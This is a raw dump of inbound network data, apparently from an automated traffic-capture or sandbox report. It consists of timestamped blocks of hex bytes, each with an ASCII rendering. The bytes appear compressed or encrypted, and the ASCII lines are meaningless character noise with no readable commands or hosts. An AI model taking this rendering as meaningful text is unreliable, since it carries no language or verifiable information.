                                                                                                                                                            2022-09-29 12:45:05 UTC12534INData Raw: 7f 6f bf 89 f7 c1 b6 83 60 c7 84 eb 8a 4b 2e 47 66 9f ec 75 75 48 07 c5 ad 86 61 0c 33 38 33 b2 a2 61 04 18 5c 81 d1 d4 db 08 e8 45 6e 67 19 1b 97 29 42 d4 8a 83 33 f6 1c 36 fc 45 99 18 98 69 3a ed 3e b3 b6 ce 04 82 80 f8 79 90 14 66 50 a8 36 77 c1 e5 86 c0 30 34 0e 30 9f 80 f1 03 12 39 d1 2c 20 a6 3b ba f6 3a 25 78 94 51 62 17 0f 16 c2 26 8b 3f 25 7b 6d 55 82 d8 88 5e a6 19 34 b9 c8 d8 50 4b 8b 7d 1d 2c 99 15 78 6f 1e 5e 90 26 a8 db 54 19 a3 f8 fb 74 1d 9f 31 aa e3 ab 45 c4 4f c5 41 68 27 90 f6 aa 88 fa e8 ef 6b dc ef e0 d9 94 b5 ca 9b 64 71 54 0b 01 bb 06 3b d8 fc d5 2c 35 c4 52 79 21 33 00 26 1b 1a 76 d1 52 70 1b f7 7f 91 9a f6 e7 ed 92 ad 91 49 6e 65 63 80 10 ea ea 6e eb bd a7 43 a6 94 82 8a 9d 65 8a ad 28 40 da cb 6a 06 4b ba 3a 2c 05 5e 50 c4 61 a6
                                                                                                                                                            Data Ascii: o`K.GfuuHa383a\Eng)B36Ei:>yfP6w0409, ;:%xQb&?%{mU^4PK},xo^&Tt1EOAh'kdqT;,5Ry!3&vRpInecnCe(@jK:,^Pa
                                                                                                                                                            2022-09-29 12:45:05 UTC12550INData Raw: 0e 0e 83 b7 d1 64 aa fc 18 9b dc 70 bf c9 78 9a 2f cd 87 b1 fb 81 98 8c 2b c4 24 2c e8 35 98 ac b6 c1 35 de 8c 57 0f 88 7e 59 bc 7d bb 8f 6f 23 32 1c a7 12 66 8f 31 1c b9 bb 05 14 c9 7d c2 9a d4 d6 98 d9 fd f9 16 ce 42 4d b3 fe 86 1a b8 b5 8f 04 79 e9 37 80 7d 2e e4 b1 77 19 f6 8b 82 f4 6f 4a af d7 43 ab 48 e6 cb 11 4e 75 76 62 6a 4e 15 41 31 d1 62 e9 7e 07 c4 b2 e8 ae 4e c6 72 0c 00 57 ef 29 5a de f2 b5 7a de 79 97 ae 6d 28 de cb c9 a1 9f 9b 8a ae 36 c2 61 67 94 4a 83 94 09 3c 87 df 9f 5b 24 b2 0d 44 56 d8 de 4d 64 1d 89 9d 10 27 e3 f8 90 d4 5a d7 f8 53 1d f6 01 13 ec 14 50 ee 7e 12 36 62 5d 39 69 97 04 20 45 b6 f0 99 0e c7 97 78 a5 d9 3e cc 66 87 ad 39 4f 5c 32 bc 43 1f 11 30 e6 4e 4f 47 23 f5 b1 e4 47 56 7c 71 7a 27 c6 e7 9d c6 97 b1 e6 a5 25 2b 0a e3
                                                                                                                                                            Data Ascii: dpx/+$,55W~Y}o#2f1}BMy7}.woJCHNuvbjNA1b~NrW)Zzym(6agJ<[$DVMd'ZSP~6b]9i Ex>f9O\2C0NOG#GV|qz'%+
                                                                                                                                                            2022-09-29 12:45:05 UTC12566INData Raw: 1a fd e3 0d be e1 14 e4 d6 04 96 9b de 7b b0 23 ff b0 06 f3 33 ad 8a 32 7a d4 66 ef 37 70 41 3a 01 21 da 04 6e 94 a1 f3 19 e4 6f 3a 85 fd 18 2c 95 0c 2b 79 fe 10 1b d6 bb 21 5c c3 f3 c5 d6 8b 9d 72 6d 66 55 2e 97 65 39 f9 a2 e0 95 82 f3 db 38 fa 54 2d df df 74 fb b2 6b a0 28 00 b7 7d 74 fc 84 f6 4f 86 39 d1 7c 0d 54 cf 77 01 85 c5 4e 14 93 2a ee ce 21 a9 70 5c 2e d3 14 83 74 5c c8 be 59 72 be 86 38 1a 88 f6 8b bc a1 a8 b3 2b d2 a5 24 a2 50 d2 9c 0f 66 20 7c e6 f5 60 c4 3d 03 f7 01 dc 57 a8 02 de 18 0d ad 83 50 55 2a e4 d9 00 7c f0 10 bf 26 6a 45 e0 53 bf ee f4 ea 7c 60 93 0c 39 fa 3d 20 64 6f 52 e3 c2 56 f7 35 d5 8c e5 e5 7c 85 15 8f 58 d4 fb 32 b8 2d f2 91 58 e9 7a 2b 5a 3d 2e 0a f9 66 c2 2b 35 c3 b3 a8 47 c0 0c 2c 81 b0 18 9f 36 00 b8 bb ca d7 03 90 4b
                                                                                                                                                            Data Ascii: {#32zf7pA:!no:,+y!\rmfU.e98T-tk(}tO9|TwN*!p\.t\Yr8+$Pf |`=WPU*|&jES|`9= doRV5|X2-Xz+Z=.f+5G,6K
                                                                                                                                                            2022-09-29 12:45:05 UTC12582INData Raw: b2 40 95 9a ed 4c 2a 13 95 ff 0a 8f f2 c3 b9 3f aa bc 36 1d 22 1a 38 65 82 f3 ab b9 ae 7c 2a 16 a3 9f 75 90 d4 4f 7d c8 cd bb 7f e4 91 0a 95 bd be 9e 15 55 80 31 5e a3 13 50 c7 61 22 9c c3 0c 4c c1 a3 48 8e 75 bd be b6 e1 d9 9a 47 de 04 f9 67 5f 81 2b 42 01 6d 4f 4e 4d ec eb bf 08 a5 8d 66 cd 3b 55 68 40 70 9f 93 7b 88 32 25 d5 a8 7d 99 56 5f 93 59 69 9a b6 ae fb a7 50 10 2a 78 5b 88 e5 1e 11 69 7a fb 9e 58 d6 b3 b2 66 4c e3 cd da 6c ad b4 1c dd 88 a7 1e d6 7d 42 53 65 56 f6 12 db 6f b8 67 24 87 29 c4 bf f8 02 85 20 80 0a 78 3d 87 fa eb 4a 75 62 da 5f 8f e5 9a ef 7c 7d f4 6b 4a 57 27 1d 63 ee 0a 7d d0 f4 cc 7e 6b 3d a1 92 2c cc 0f 7a 0c 7b 8a 6d 9f c2 63 24 f6 8a be 7c 5d 64 8d 15 9e 29 99 7c f9 cb d6 e0 94 27 03 72 31 4b 68 42 47 bb 0e 39 93 25 db 4d 50
                                                                                                                                                            Data Ascii: @L*?6"8e|*uO}U1^Pa"LHuGg_+BmONMf;Uh@p{2%}V_YiP*x[izXfLl}BSeVog$) x=Jub_|}kJW'c}~k=,z{mc$|]d)|'r1KhBG9%MP
                                                                                                                                                            2022-09-29 12:45:05 UTC12598INData Raw: 9b 38 d2 d8 ec 9a f5 f9 9f 24 8c 10 e4 f5 e7 4d b8 bd 22 b0 b9 5d 8c 7b 68 0a 1c 27 9a 27 05 41 76 32 d1 ca fd 8a 34 40 f6 7d 39 fe a3 e0 8a c0 6a d3 6d 46 d6 ea 2c 83 33 16 c6 9c 2e b6 70 45 9c 99 a7 91 eb 35 c1 02 26 28 d6 d6 0a 9f 60 8e b3 ce 0d 97 41 3a 3c c4 dc 16 5d 6f 91 15 6c 67 9c 63 54 2d 09 d7 0c f3 ef ed d1 f1 ec 6c 93 32 bf 89 36 f7 17 75 53 57 32 08 93 59 01 e4 c4 18 02 5d af b3 7c a1 d4 76 5e 84 25 c8 f3 7d 99 48 63 ea cb d2 e4 58 29 67 06 c9 c6 43 b2 c4 70 96 f6 3d d5 32 e9 fd d6 bc 70 9e b8 ce 39 21 9f 22 ea 3b 83 3e 2e cb 98 ee a1 56 3d 2d f8 65 bd 0d c2 2d a2 8a 2f 68 c5 7c bf a1 db 73 11 5c 2c bc e8 cf d1 87 6a 30 c2 67 00 90 23 81 c3 4d 1d 43 50 a0 bb 87 8d b0 f0 7a e8 2a a4 65 35 48 92 4b ff 2b e9 43 d7 4f 3d 54 53 78 88 c7 4d 8c a9
                                                                                                                                                            Data Ascii: 8$M"]{h''Av24@}9jmF,3.pE5&(`A:<]olgcT-l26uSW2Y]|v^%}HcX)gCp=2p9!";>.V=-e-/h|s\,j0g#MCPz*e5HK+CO=TSxM
                                                                                                                                                            2022-09-29 12:45:05 UTC12614INData Raw: 79 b2 fe 5b 50 b3 13 74 38 d4 a8 b6 b1 2a d1 98 c1 5d 4a c1 cd 3e 92 14 65 f3 a9 05 4a aa e4 ae cc d0 74 58 82 bc b7 83 98 dd 09 1e 21 9d 6e 8b 6d 51 6e c9 e8 56 af b0 2a 0c 40 fc 5b fc 6a e4 23 b8 ce 65 8f 3c 77 15 d4 e8 22 d2 7d 1c cc 56 b7 86 11 ec 1f da e5 4a 6d e2 87 42 c8 32 2b 8e fe 70 dd 32 3c 25 02 9b 0b 8a 1c 3c 49 6b 42 dc a3 73 fb 15 8c 0e ae 8a 92 4b db 77 5d 4e e0 2b 03 0f 47 54 cc 42 5e d2 1c 0c 95 e6 a5 09 34 88 08 b5 cb 26 76 fb b7 16 06 9e c5 7e 5e 95 a8 da 57 c4 0f 3b 96 93 21 b7 5d ed 54 aa 06 34 7b 67 91 06 13 60 a5 c3 88 9e 1a e6 e9 70 56 b9 80 57 84 20 90 e4 a8 5d de a6 63 c0 d1 78 df c8 fe c1 2e 50 a6 8c 71 af 8f bc 35 e8 0e d2 9b 5a 1e d9 06 be 4e f2 c0 9f d5 0b 87 f2 a1 8c e6 c2 7e e4 34 02 b4 5d 06 5f c4 a4 d6 43 6c ff a6 00 dd
                                                                                                                                                            Data Ascii: y[Pt8*]J>eJtX!nmQnV*@[j#e<w"}VJmB2+p2<%<IkBsKw]N+GTB^4&v~^W;!]T4{g`pVW ]cx.Pq5ZN~4]_Cl
                                                                                                                                                            2022-09-29 12:45:05 UTC12630INData Raw: 17 68 42 d6 8b f4 28 c9 d0 d5 ee ae 5a b1 f5 4a fa fc ea c2 de 4d d9 c3 4d 9b e5 a0 a6 eb f8 94 be 78 e4 b0 c3 8a b7 22 16 38 0a cc 6d e1 05 4e 22 dd 4d 7c 43 f6 d8 db a6 10 ce 5e 01 28 b3 1f a8 21 93 7e 9f f5 c8 be 80 e8 8a f3 be b3 a9 37 bb bc 96 d6 80 a3 cf ee 88 33 a0 82 10 96 eb 99 f7 ee a4 b2 f0 2f 07 ce 1f ad b1 ac 34 2a 5d 71 2d 97 68 8a 2f c0 24 a1 80 7c 35 16 2e 7c 67 13 98 cf df bf 08 ac fc b6 63 bd 17 d8 3e ab 14 64 0f 82 8d c7 1d 51 fc 07 ce de e0 54 dd cb d3 84 6d 71 b0 e7 5d 8e 13 15 2c da a5 5f ce e3 44 58 cd e9 c0 3a f4 1d b3 d5 dd ec 9c 50 ec 0f 8a 46 a2 c1 8e e9 98 6a 0b 34 a2 25 a0 ba 82 e1 8b 2b b1 b3 c1 a1 86 11 c1 31 e1 e1 1e a0 60 97 26 70 35 b9 f0 fe 08 cf 6d e6 e9 0f 5a f5 cb ab b8 99 eb 45 ad 6d 3c b9 37 02 80 91 44 08 61 f8 4c
                                                                                                                                                            Data Ascii: hB(ZJMMx"8mN"M|C^(!~73/4*]q-h/$|5.|gc>dQTmq],_DX:PFj4%+1`&p5mZEm<7DaL
                                                                                                                                                            2022-09-29 12:45:05 UTC12639INData Raw: e1 96 de d9 b8 1c f4 8e ae d9 c7 88 79 00 ff 60 c8 e1 fc 34 7c 45 53 67 42 6e fc 5c 70 e0 44 38 fe 99 9e 46 61 22 ef 51 63 e2 ec 2c 4d 2a dd da 0f c8 9c 3e 97 da a3 e1 c7 74 d9 57 b3 a5 98 f8 5f 09 8f fa 42 28 fe 19 96 80 0d b1 98 7b 6d 72 db af eb 1b 8e 7c 63 14 a7 67 e3 33 3f a3 07 f9 5f 5c 54 b7 9c 92 2a 6d 4b 46 c6 a0 e4 c6 54 99 ba 92 6c 43 e6 7d f6 f9 e8 e8 1d b1 c4 35 62 a6 61 86 29 d1 48 cf 2f b0 80 a9 22 29 25 ae 81 31 96 63 91 61 44 c6 77 54 1a 45 5e a3 e3 91 f6 ce 7f fb 84 61 87 36 38 a0 58 3e 69 46 12 83 f6 d6 cc 5a 15 d4 c5 2c 61 c2 c5 a8 b4 c2 ed c7 c8 8c e3 56 81 85 8c 01 85 f8 bd dc 82 95 4d 26 46 c6 93 1a d3 a3 1e f2 ab b7 b3 f4 1a 1c 3c 47 ca 3f c1 e3 0d 2d 8c b9 6c a8 b2 3f ff b0 6b 60 02 c4 19 65 d5 82 4c 5a 83 a9 cb 14 60 de c8 8f d5
                                                                                                                                                            Data Ascii: y`4|ESgBn\pD8Fa"Qc,M*>tW_B({mr|cg3?_\T*mKFTlC}5ba)H/")%1caDwTE^a68X>iFZ,aVM&F<G?-l?k`eLZ`
                                                                                                                                                            2022-09-29 12:45:05 UTC12655INData Raw: 06 5f 44 a7 2e f1 b2 6a 83 69 d5 21 17 5f d7 88 16 70 50 dc 0d bc 1a 41 36 18 c4 99 85 aa 8b 60 08 84 6d 4b 57 a1 66 db 65 39 9f 25 0d a8 51 44 39 f2 70 47 d4 08 92 cd d1 0f a1 e2 a6 12 6d 0d 40 98 fa 92 10 c6 e9 b2 70 1d d3 e7 b7 de fe eb 32 a2 95 a6 81 41 8e 9b 3b b9 49 49 d3 e3 5d ad de ab 8e 9d d7 30 64 89 c0 dd da 3b bb 54 64 ff d5 55 9b bd 6a 2b 3c 04 66 b6 f8 47 b1 66 63 00 18 8f c3 9d aa b9 18 e8 49 4c 09 cb 3b 88 b5 1a a2 a4 3d ab 8c ec 80 f6 11 52 b1 99 b1 1a 34 68 32 7b 3b be 3b 80 0a a3 ce 50 dd b1 17 07 05 1a e9 e8 b5 f1 57 5f 01 32 d3 93 54 e5 e2 43 bd b8 6d b3 d7 42 d7 db 92 67 4f d6 c1 5b 48 12 5e ae 27 29 f4 de 5c be 13 cd 7f e5 ea a3 c0 2d 4c 17 94 a6 67 d5 35 ea f2 b0 08 67 54 c3 10 32 64 44 21 3e d7 e2 fc b1 da bd 85 5f 18 ac 19 02 0d
                                                                                                                                                            Data Ascii: _D.ji!_pPA6`mKWfe9%QD9pGm@p2A;II]0d;TdUj+<fGfcIL;=R4h2{;;PW_2TCmBgO[H^')\-Lg5gT2dD!>_
                                                                                                                                                            2022-09-29 12:45:05 UTC12671INData Raw: 7c a8 7c 4b 8e fc 6a 0e b9 fc bb b4 9a be 12 e2 a7 9b 65 0a c7 c1 60 00 4e 96 b0 ae a7 7c 12 ad 49 48 55 35 bb f4 e5 3a 9a f7 d8 45 66 5b f0 f6 31 a7 42 2f ac 42 1f a5 43 9c da 53 bb a1 c5 30 4a f4 29 08 32 19 9e d8 5b f7 78 69 25 7c 72 fb a7 85 16 24 3f 6a 64 d1 5b 4c 90 80 02 8d b5 5d ac 0e 27 b6 36 eb c8 a6 f7 bb 13 3c 87 a5 2c 07 e8 91 71 d2 00 b6 8c ee ee 51 84 f3 76 bc 2f b8 e8 63 bc 6c 00 e8 7d 6a 7b 7d 26 a0 8d 04 75 cb d3 07 48 e1 2b bf 90 f9 84 bb c7 48 97 59 cd 94 d1 3f 99 a3 85 3f a2 4d 91 4f d5 5a d3 24 cf a5 d4 e8 fe 10 ea 3f a9 f3 a0 e8 1c 7d 2c ba 8f df 78 f4 d7 2c f9 8b 0b 6a da bf 0c d6 bb f5 d3 22 a9 a6 a1 18 ff fc 77 fd fc 68 38 27 d1 88 d8 b0 a5 6b 14 a0 04 ff 20 7b f4 6e 6a ff 73 e3 89 ff 35 ad 6f c9 f4 aa ad a0 10 90 3e cd 62 e3 17
                                                                                                                                                            Data Ascii: ||Kje`N|IHU5:Ef[1B/BCS0J)2[xi%|r$?jd[L]'6<,qQv/cl}j{}&uH+HY??MOZ$?},x,j"wh8'k {njs5o>b
                                                                                                                                                            2022-09-29 12:45:05 UTC12674INData Raw: dd 6b f0 8b bf 0e 20 28 ea dc 5b e3 da ff 9f 0b 41 0b 67 fd fb 2c 14 73 db e2 f3 5c 29 5a 0b a5 a9 ed 6f fe a2 eb 58 38 4a 9b f1 5c 65 cf 23 ca a0 4a 07 d2 0b 69 28 b5 9c 20 0c 03 dd a6 60 48 4a 13 98 5b 87 9d 3c b9 dd c6 88 42 5d 72 56 ac e3 94 e4 a8 ec 73 91 2d 73 04 89 24 b2 9f 59 85 c1 99 b9 a9 ad 39 8f f2 f2 e6 47 58 67 73 81 26 29 97 56 33 a1 34 5d b8 25 7b c4 c4 57 44 3b 92 ea 4c aa 09 93 81 73 3f 80 cc f5 4c 1b d9 f2 c2 82 44 ca c1 cc b4 fb e5 e0 4b e4 ba 0a 17 70 7b fe c1 fc 63 40 26 92 a3 4c 75 b2 81 95 0c 60 c2 0a c0 ab 7f 46 e0 34 58 30 38 32 20 ef 2a 15 23 35 36 0e d6 d3 f7 c1 31 66 58 6b 43 75 c1 a3 5c 1a a5 9d a1 76 47 dd cc 5e b1 a8 29 33 4e 6e 0f dc ad f5 f9 ac 7b d2 d2 9b 84 43 87 69 cd 5c 20 5d 8a 61 c2 ca 39 25 9d 26 28 36 8f 5e de db
                                                                                                                                                            Data Ascii: k ([Ag,s\)ZoX8J\e#Ji( `HJ[<B]rVs-s$Y9GXgs&)V34]%{WD;Ls?LDKp{c@&Lu`F4X082 *#561fXkCu\vG^)3Nn{Ci\ ]a9%&(6^
                                                                                                                                                            2022-09-29 12:45:05 UTC12690INData Raw: 56 cf bc 4a 2a a5 a0 4f d2 90 4b 59 a9 39 59 f1 a0 b8 55 77 17 11 d5 eb b9 ab ed 52 79 1b 75 9c 1f 9b 4a 47 30 27 80 41 50 21 94 89 53 dc f4 95 0a a1 9d 26 5c 60 56 44 67 f9 4f 24 55 f6 d4 f2 bc 5b 5c 3a 45 0b 5c 7f ff da 9c 8d ba 27 01 70 3d 20 3f cf 76 d4 2b f5 f9 51 b8 7e f3 78 b0 35 5c 83 32 95 0d 51 19 e3 d3 7f d2 84 aa 35 9c de 07 23 0f 67 ff 37 e6 ad bb af 00 83 d5 52 66 4e e8 56 83 b6 c0 79 ea 1c 0f 7f 49 c4 89 6f 65 bf a9 61 4d 3c af 3a 0d 97 83 4c b0 6e 95 6c 8e 86 a7 3f 00 46 00 b8 c2 ce 04 af b5 8b 35 85 65 5d 48 84 a0 78 29 ce 91 ab 4c dd f6 39 37 4f ff 09 c9 7a 87 0c a8 a6 62 60 8a 6a 5a ba 2b 9a c2 5e 55 b4 03 a7 6b b0 57 67 74 ae 36 69 8c 9b c1 c8 f1 a3 62 ec ef e4 19 17 06 53 b8 a7 54 ce ec f9 38 9d 5f 81 08 e6 41 d0 b7 1e 93 4b ef e7 57
                                                                                                                                                            Data Ascii: VJ*OKY9YUwRyuJG0'AP!S&\`VDgO$U[\:E\'p= ?v+Q~x5\2Q5#g7RfNVyIoeaM<:Lnl?F5e]Hx)L97Ozb`jZ+^UkWgt6ibST8_AKW
                                                                                                                                                            2022-09-29 12:45:05 UTC12706INData Raw: a4 96 c2 e6 f0 a6 2a 91 a0 20 87 8b ac 2f af ed 85 36 b7 b5 70 24 0e 20 ab c5 81 f9 a5 71 02 40 ce b1 a6 82 2a 29 15 39 7b 4d d7 01 70 9e 9a a1 fd a4 17 dc 0e c2 1a 3f 55 03 cb 0b cb 64 4f 2e 2c 0a 29 4b 7d ed c6 28 73 7c b9 e1 02 ab 22 c1 ab 33 4f cd 87 f2 c6 93 85 08 d3 11 51 cf 3f 3d 31 21 16 bd dc 50 94 1f bf 0f 44 ee 27 bd a3 f4 41 cb f2 ee 04 a3 06 c9 80 36 e5 0e ee 6d e6 3f 91 d2 21 32 5b eb 72 b2 31 6a 20 68 70 60 df 6b cf 73 2f 45 2c 0a 26 e0 3b e9 5d 78 ac a3 bf e5 56 cc 2b 4f 66 b9 3d a1 27 11 d8 2e a5 3c 28 06 e5 ef 8f d1 a4 ce 63 42 06 85 fe 19 25 4f 17 df 50 87 eb dc ca b9 45 21 ca 4b d4 64 f8 f0 eb 3c 43 25 f1 c9 06 8e 65 c8 e7 e1 17 82 ff cf 7f d1 83 6d 20 3f 63 3b 74 a7 80 67 ca bf 14 74 ab c1 9a e1 b1 05 b2 6c 12 ca 74 9d 16 98 e2 d7 0e
                                                                                                                                                            Data Ascii: * /6p$ q@*)9{Mp?UdO.,)K}(s|"3OQ?=1!PD'A6m?!2[r1j hp`ks/E,&;]xV+Of='.<(cB%OPE!Kd<C%em ?c;tgtlt
                                                                                                                                                            2022-09-29 12:45:05 UTC12722INData Raw: cd 08 37 f1 16 55 d3 62 f4 0d 9e d3 dd 7d 2c c0 57 ff f4 ca fa 2a 84 c2 48 08 ef 5e 96 a6 c4 6e e7 0b da 38 d8 de fe 99 65 fd dc 1b 12 ed 34 0d d2 b4 eb 3d 1b 51 c6 75 5e 08 64 9c 3e ff 45 2b 32 e5 a3 e1 5d c2 ea 9a cf 1a 8b 9c 0f b2 fb 94 8c 0b ee 52 64 84 70 6f e5 dc 40 68 19 17 f2 af 2a f0 25 92 32 c6 e1 38 7b 39 de fe 3e 0f c1 88 d0 ed f7 0d 96 53 68 b2 dd 6c 9e 65 0f 7b 93 fd 4e 2e eb 36 2c 40 ee 08 e1 11 5a 2c ee 20 cf 81 a5 b0 e4 83 b0 63 b3 07 ab 44 dd 78 7c ff b5 b4 b8 57 5b e0 06 88 9a 5e 64 cb c9 c0 ed 28 d6 9c 35 e1 7c 6b 67 fb 49 c5 23 c4 f3 e0 d7 30 65 c6 c8 14 b3 51 ee c0 ad 4c 45 2e 0a 1b 58 de cc d9 f3 1d c1 96 4e 30 c8 6e ee 13 61 a3 b9 d5 64 af 5d 0a 5a 59 28 76 dd 2f 98 6f b7 85 dc e5 c5 9b 39 d3 73 d6 d5 cd 66 27 a2 c1 24 39 e7 8d d1
                                                                                                                                                            Data Ascii: 7Ub},W*H^n8e4=Qu^d>E+2]Rdpo@h*%28{9>Shle{N.6,@Z, cDx|W[^d(5|kgI#0eQLE.XN0nad]ZY(v/o9sf'$9
                                                                                                                                                            2022-09-29 12:45:05 UTC12738INData Raw: ca 78 76 a7 7b 71 96 e5 ca 8b f5 20 7f e3 7c cc 2f f1 f9 d5 d3 4b 91 b8 26 ba bc 1f b9 8a 63 4c 93 a2 b5 23 3c c4 c8 f2 f7 3e 1f 25 71 0f ca ae 83 ab 9c 10 60 1a 76 2e 58 43 f7 72 54 9f 19 7a 03 67 06 65 c6 ed 96 0a 3d fd 25 27 77 3d b7 fd 16 cb 01 fc dc ff 55 75 81 f8 e9 d5 13 de 32 aa 78 77 eb 9a 1c 04 79 c4 81 ff e0 2c 0a c4 44 4b ae cd df 8c 84 f9 fa 6b 96 27 b8 83 6f 31 a1 58 f7 dc b1 f3 0b 0c 83 e8 85 a9 a8 b8 39 bc c5 68 60 af 06 7d a7 b1 73 7c a3 d5 59 68 0c 43 e7 a5 e0 69 eb 62 c4 41 07 86 d2 c2 51 30 56 14 00 6f 37 9e 01 c9 62 a3 89 9b c1 b5 b2 32 03 61 48 a7 65 7c 63 b8 29 70 9a 27 b5 cb b6 1d 63 d8 41 e5 88 e0 e9 70 03 42 0c 33 e2 a2 ef 1e 03 4a 6f 0a 02 f7 eb 14 33 11 e9 ca 54 06 a0 a7 7a b6 91 ea 01 7d 98 3a cd a4 d5 0d a5 aa 21 36 62 bb 91
                                                                                                                                                            Data Ascii: xv{q |/K&cL#<>%q`v.XCrTzge=%'w=Uu2xwy,DKk'o1X9h`}s|YhCibAQ0Vo7b2aHe|c)p'cApB3Jo3Tz}:!6b
                                                                                                                                                            2022-09-29 12:45:05 UTC12754INData Raw: 73 fb 36 1c 73 a6 0d cd 64 23 68 a7 04 b3 9c 98 ba 59 84 85 6d 2e c1 c6 7b 38 32 46 4c e1 61 4a fb 0f 4b cd 5c c1 1c 45 1a 1e 50 44 e9 00 15 c9 f6 28 1e d2 a8 46 13 24 c5 6d 7e 50 f8 59 68 3e 23 94 9d 16 16 93 c6 8f 49 ca 49 24 25 87 79 94 8b 97 b4 94 9e 4c 36 49 07 8b 74 19 15 c3 6b c1 ee 8d de 2e 19 cc db bf fc af ae b7 1d e7 c7 47 59 99 12 8f ff 12 45 d6 4c 13 77 4a 27 a8 0c 0f df c5 17 2d 8d 6b ec 8d 9c bb 60 17 a3 5d ef 8c 94 1a d7 45 2d 2a 52 a7 3e 78 0b 92 c1 02 e1 13 5b ec ac fa 75 ae 30 b5 d0 77 b9 35 15 b6 9b cb 75 d3 80 d1 a1 aa f8 e7 b6 53 2b 3b a5 04 3f ec 04 de 1d 78 56 36 91 b2 d8 bc 0e 0f 31 6d 38 9e 00 92 a6 ad 6d 21 fa 2e fe 92 93 96 60 31 29 f2 32 a4 17 58 e3 d8 ee 33 db c9 8f fe 11 09 03 2f c1 e8 1e 76 8c c9 93 e7 e0 24 f7 36 f5 93 bb
                                                                                                                                                            Data Ascii: s6sd#hYm.{82FLaJK\EPD(F$m~PYh>#II$%yL6Itk.GYELwJ'-k`]E-*R>x[u0w5uS+;?xV61m8m!.`1)2X3/v$6
                                                                                                                                                            2022-09-29 12:45:05 UTC12770INData Raw: 95 53 51 d7 d5 db 28 31 e3 fb cd 56 76 73 b0 2e 80 e5 d7 bb bb 62 97 7f dd 89 93 87 05 32 ba 45 68 ad 15 c7 a2 f6 4d ea 4c 56 ba 9c 43 db 1c 18 31 e2 dd c5 a0 37 50 3c cf b0 f2 27 60 be 91 0b 88 84 4c 9f 40 6f 4b 95 0d 23 be 89 fd 7c e5 a9 bb 8e 1d 37 24 0b aa 3d 3e 9f 86 65 e4 d6 21 d8 51 9d 8c 70 be c3 77 51 f8 dd 60 c0 c0 37 c8 5d fe 1e 0c ee a0 0e 4a 71 cb 8d f1 b7 9c 66 7a 28 ef 57 f0 8d 35 bd 3b 57 44 de b7 c2 a7 f6 fc 85 9b b0 8c 1d 65 d3 ea e6 f1 94 c9 40 f2 f3 12 6d b0 71 72 a8 7f 2d 5f f6 80 87 dd ef ae e4 ec 07 d5 d6 ed 72 a2 3a c8 a9 8b 2e ce df 06 e4 20 ba aa 16 33 a3 e6 26 39 b7 be 8c a7 db 00 a6 68 86 66 0a 50 f4 f8 f4 a9 eb 00 8a c8 9a ff 8d a0 d1 01 61 b9 16 18 e3 54 d1 ad 8e 25 23 66 31 ea af e8 37 85 f2 78 5a d4 d9 8a 9c 2c 4c ff 79 bf
                                                                                                                                                            Data Ascii: SQ(1Vvs.b2EhMLVC17P<'`L@oK#|7$=>e!QpwQ`7]Jqfz(W5;WDe@mqr-_r:. 3&9hfPaT%#f17xZ,Ly
                                                                                                                                                            2022-09-29 12:45:05 UTC12786INData Raw: dd 66 a2 eb 6d cb ba 51 e9 ff c9 80 22 d6 e7 a2 62 fe 85 e5 f2 f0 b9 13 fb c8 ff da 10 c4 df 21 0b d3 e1 ae 7a 89 49 f3 c8 a1 03 6f 58 45 d4 35 40 ae c9 ea e4 4e 7d 5f e6 2f 6d e9 59 ce b5 6a da 2a f3 d7 c4 23 46 d3 79 de 91 20 a1 bd 15 81 19 db 46 f5 4f 18 1a d2 bb a1 f5 2f 86 71 3b 19 fe d3 86 fc e0 ea b4 16 72 a9 64 a1 28 b0 b4 e9 f1 10 0b f1 b6 37 33 02 05 44 1e 4b 14 3a 3f 53 65 e9 f4 e0 b3 63 4c f5 9f 36 6c e5 0e 63 b3 62 10 83 9e 6a 1e 96 99 44 e5 3e c2 5c b8 db 93 e4 e3 a3 0d b7 af 5d eb 5e 58 c5 81 a0 62 5f d1 cc 6e 9a bc f1 78 81 ab 4c fb 63 91 18 45 a6 f0 07 93 52 03 ae fa 4f 7f 9b d6 b7 93 e5 8b 5e 35 da 1e fe 6a 09 cc 80 e6 8d 98 02 ce 6a ce b8 21 a6 16 15 25 f4 f1 52 01 c4 89 98 28 28 a2 9d a4 d3 54 87 9c 4d 0e 61 88 f2 04 cf fc 72 ec d0 39
                                                                                                                                                            Data Ascii: fmQ"b!zIoXE5@N}_/mYj*#Fy FO/q;rd(73DK:?SecL6lcbjD>\]^Xb_nxLcERO^5jj!%R((TMar9
                                                                                                                                                            2022-09-29 12:45:05 UTC12802INData Raw: 56 65 4b 96 c0 49 4d 95 c4 bc 97 a6 e5 64 78 11 17 0b 04 c3 e7 33 41 84 e6 03 3a b8 45 46 ef 36 b3 b5 83 5b 98 71 89 26 dd aa 51 26 35 a8 4f 98 63 d5 48 95 13 23 d4 a2 5a aa a0 fa dc 4e dc 70 c6 81 13 b5 37 f3 2b ab 99 2b 4b d1 de 21 b7 f3 41 5a 29 af 2f 2a ef 16 aa 53 2c 44 22 22 39 1b bb 14 96 2e d7 22 97 a1 8a ab 03 7d 08 ed cb aa 12 aa d0 1a 64 61 76 e4 22 b0 10 ad e0 7d c3 65 84 75 97 bc d0 54 7a d5 41 62 23 41 22 0f fe 8f bc 15 d7 a0 19 2b 9f d0 c9 10 e4 4a 0a 38 bf f7 57 3e 44 28 b5 d9 d9 0a 5d b8 ec 57 98 3e fc da 96 37 e4 39 39 9f 72 f6 c2 b0 41 10 92 7c b2 7d ce 6e 1b eb 84 2b 8d 02 96 4a 01 ad 5b 42 f0 7d bf 7f 31 09 26 a9 bc 63 e3 b7 5d 89 9f bb 2d fc 11 21 07 a5 93 24 3b af b2 65 f8 d4 ef 68 72 96 e9 82 b3 7b 48 f3 ae 99 cc a3 da da 00 4c e7
                                                                                                                                                            Data Ascii: VeKIMdx3A:EF6[q&Q&5OcH#ZNp7++K!AZ)/*S,D""9."}dav"}euTzAb#A"+J8W>D(]W>799rA|}n+J[B}1&c]-!$;ehr{HL
